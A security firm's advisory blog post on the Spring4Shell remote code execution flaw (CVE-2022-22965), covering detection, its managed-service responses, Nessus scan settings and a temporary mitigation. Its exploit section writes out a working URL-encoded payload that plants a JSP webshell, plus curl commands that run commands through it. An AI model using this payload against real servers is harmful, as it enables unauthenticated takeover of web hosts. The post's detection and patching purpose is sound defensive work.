Spring-Logo

Spring4Shell Detection & Mitigation CVE-2022-22965

Description

Spring4Shell, or CVE-2022-22965, is a RCE (remote code execution) flaw in the “Spring framework”. Spring, as it is commonly known, is an open-source application framework that provides infrastructure support for developing Java applications. Basically, it helps you write Java applications. According to https://spring.io :

“…Spring is infrastructural support at the application level: Spring focuses on the “plumbing” of enterprise applications so that teams can focus on application-level business logic, without unnecessary ties to specific deployment environments.”

Currently, all versions of Spring are impacted, but the web application must be running on JDK version 9 (the local Java installation) for the application to be vulnerable.

The application must also be running on top of Apache Tomcat.

The impact here is that an application running on a web server will have certain permissions. Those permissions will vary greatly, depending on how the application is built and installed. You should always assume that the web services is running with root privileges until proven otherwise. With that in mind, this Remote Code Execution vulnerability would allow an unauthenticated attacker to run commands on the underlying web server with the permissions of the web service.

Image 1: Bad bad bad!

Detecting Exploitation

Understanding the Exploit

The vulnerability relies on the ability to traverse the properties of a java class from a query parameter and locate a file that the attacker can both write to and has meaning to the execution of the program.

You would then make a request like such:

curl 
‘http://localhost:8080/spring4shell?class.module.classLoader.resources.context.parent.pipeline.first.pattern=test’

Example exploit code:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di

class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp

class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT

class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell

class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

The above creates a file called shell.jsp in the webapps/ROOT folder. One final command can be used to exploit the vulnerability:

curl http://localhost:8080/shell.jsp?cmd=whoami

Understanding Detection

Filename/Web Shell
The initial PoC used a filename called tomcatwar.jsp, however, this is trivial to change so any new .jsp files should be scrutinized.

Log sources: Web server OS-level logs, Web server (e.g. Apache Tomcat) logs, EDR logs

 

POST Requests
It may be possible to detect by inspecting POST requests. Look for requests that contain class.module.classLoader.resources.context.parent.pipeline.first in the url.

Generically, looking for *.jsp or *.class* may also help detect.

Log sources: Web server (e.g. Apache Tomcat) logs

 

Yara Rule
This yara rule is designed to detect JSP webshells and in particular references the possibility to detect webshells found after exploiting the Spring4Shell PoC:
https://github.com/Neo23x0/signature-base/blob/master/yara/expl_spring4shell.yar


SecurIT360 SOC Managed Services

If you utilize our SOC Managed Services, here are the actions we are taking to help detect this activity:

MDR Services

  • There is an MDR rule in place looking for traffic associated with known IP addresses, we are pulling from a GreyNoise Trends list.
  • A firewall block list is available if you would like to proactively block these IPs at your firewall – https://www.greynoise.io/viz/tag/spring-core-rce-attempt.
  • Nessus has released some plugins to help detect systems vulnerable to this exploit and we have incorporated these into your External Vulnerability Scans over the weekend. If we detect internet facing vulnerable systems in your environment, we will contact you directly.

EDR Services

  • We have incorporated known IOC information to help with detection, if we see activity related to this exploit, we will contact you directly.

Vulnerability Discovery

Here we are identifying affected systems.

For Nessus plugin ID 159374, “Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965),” users are required to enable the “Show potential false alarms” setting, also known as paranoid mode, in their scan policy in order to enable this plugin in a scan. In addition, the “Peform thorough tests” setting must be enabled as well.

We also recommend enabling only this specific plugin in a paranoid scan. Scan policies configured to have all plugins enabled will see an increase in the number of triggers, as it will include all paranoid plugins during the scan.

Enabling Paranoid and Thorough Tests Modes

To enable this setting for Nessus and Tenable.io users:

  1. Click Assessment > General > Accuracy
  2. Enable the “Show potential false alarms” option
  3. Enable the “Perform thorough tests (may disrupt your network or impact scan speed)” option

Plugin ID 159374 is available in feed serial 202203311743.

Mitigation

Patch
Temporary mitigation

To apply the temporary mitigation, applications could extend RequestMappingHandlerAdapter to update the WebDataBinder at the end after all other initialization. In order to do that, a Spring Boot application can declare a WebMvcRegistrations bean (Spring MVC) or a WebFluxRegistrations bean (Spring WebFlux). More details here: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

Resources

Proactively Guard Your Business From Cybersecurity and IT Threats. Request a Free Consultation Today.